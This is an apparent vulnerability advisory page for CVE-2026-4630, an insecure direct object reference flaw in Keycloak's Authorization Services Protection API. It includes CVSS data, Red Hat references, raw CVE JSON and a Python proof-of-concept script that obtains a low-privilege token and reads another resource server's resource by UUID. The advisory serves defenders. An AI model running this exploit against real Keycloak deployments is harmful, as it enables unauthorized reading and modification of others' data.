Security Vulnerability Report
CVE-2026-4630 CVSS 6.8 MEDIUM

CVE-2026-4630

Published: 2026-05-19 12:16:19
Last Modified: 2026-05-20 17:16:27

Description

A flaw was found in Keycloak. An authenticated client could exploit an Insecure Direct Object Reference (IDOR) vulnerability in the Authorization Services Protection API endpoint. By knowing or obtaining a resource's unique identifier (UUID) belonging to another Resource Server within the same realm, the client could bypass authorization checks. This allows the client to perform unauthorized GET, PUT, and DELETE operations on resources, leading to information disclosure and potential unauthorized modification or deletion of data.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak (see the official security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Configuration
KEYCLOAK_URL = "https://keycloak.example.com"
REALM = "master"
CLIENT_ID = "attacker-client"
CLIENT_SECRET = "attacker-secret"
TARGET_UUID = "b8e08e4e-1e7b-4e3c-9c2f-1d4e5f6a7b8c"  # UUID of victim's resource

# 1. Authenticate as a low-privilege client to get a token
auth_url = f"{KEYCLOAK_URL}/realms/{REALM}/protocol/openid-connect/token"
auth_data = {
    "grant_type": "client_credentials",
    "client_id": CLIENT_ID,
    "client_secret": CLIENT_SECRET
}
auth_resp = requests.post(auth_url, data=auth_data)
access_token = auth_resp.json().get("access_token")

if access_token:
    print(f"[+] Authenticated. Token: {access_token[:20]}...")

    # 2. Exploit IDOR - Access another resource server's resource using the UUID
    # Endpoint: Authorization Services Protection API
    target_api_url = f"{KEYCLOAK_URL}/realms/{REALM}/authz/protection/resource_set/{TARGET_UUID}"
    headers = {
        "Authorization": f"Bearer {access_token}",
        "Content-Type": "application/json"
    }

    # Attempting GET (Information Disclosure)
    response = requests.get(target_api_url, headers=headers)
    if response.status_code == 200:
        print("[+] Exploit Successful! Retrieved resource data:")
        print(response.json())
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
else:
    print("[-] Authentication failed.")

References

https://access.redhat.com/errata/RHSA-2026:19596
https://access.redhat.com/errata/RHSA-2026:19597
https://access.redhat.com/security/cve/CVE-2026-4630
https://bugzilla.redhat.com/show_bug.cgi?id=2450245

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-4630",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T12:16:19.290",
    "lastModified": "2026-05-20T17:16:27.240",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw was found in Keycloak. An authenticated client could exploit an Insecure Direct Object Reference (IDOR) vulnerability in the Authorization Services Protection API endpoint. By knowing or obtaining a resource's unique identifier (UUID) belonging to another Resource Server within the same realm, the client could bypass authorization checks. This allows the client to perform unauthorized GET, PUT, and DELETE operations on resources, leading to information disclosure and potential unauthorized modification or deletion of data."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {"url": "https://access.redhat.com/errata/RHSA-2026:19596", "source": "[email protected]"},
      {"url": "https://access.redhat.com/errata/RHSA-2026:19597", "source": "[email protected]"},
      {"url": "https://access.redhat.com/security/cve/CVE-2026-4630", "source": "[email protected]"},
      {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450245", "source": "[email protected]"}
    ]
  }
}